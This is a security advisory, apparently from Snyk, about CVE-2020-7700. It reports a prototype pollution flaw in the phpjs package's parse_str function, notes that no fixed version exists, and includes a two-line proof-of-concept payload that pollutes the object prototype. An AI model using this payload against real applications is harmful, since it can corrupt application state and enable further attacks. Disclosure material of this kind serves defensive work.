Prototype Pollution Affecting phpjs package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.66% (81st
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-PHPJS-598681
- published 14 Aug 2020
- disclosed 14 Aug 2020
- credit Beomjin Lee
Introduced: 14 Aug 2020
CVE-2020-7700 Open this link in a new tabHow to fix?
There is no fixed version for phpjs
.
Overview
phpjs is a community built php binding in javascript.
Affected versions of this package are vulnerable to Prototype Pollution via parse_str
.
POC:
require('phpjs').parse_str("__proto__[polluted]=true",{});
console.log(polluted) //true
CVSS Scores
version 3.1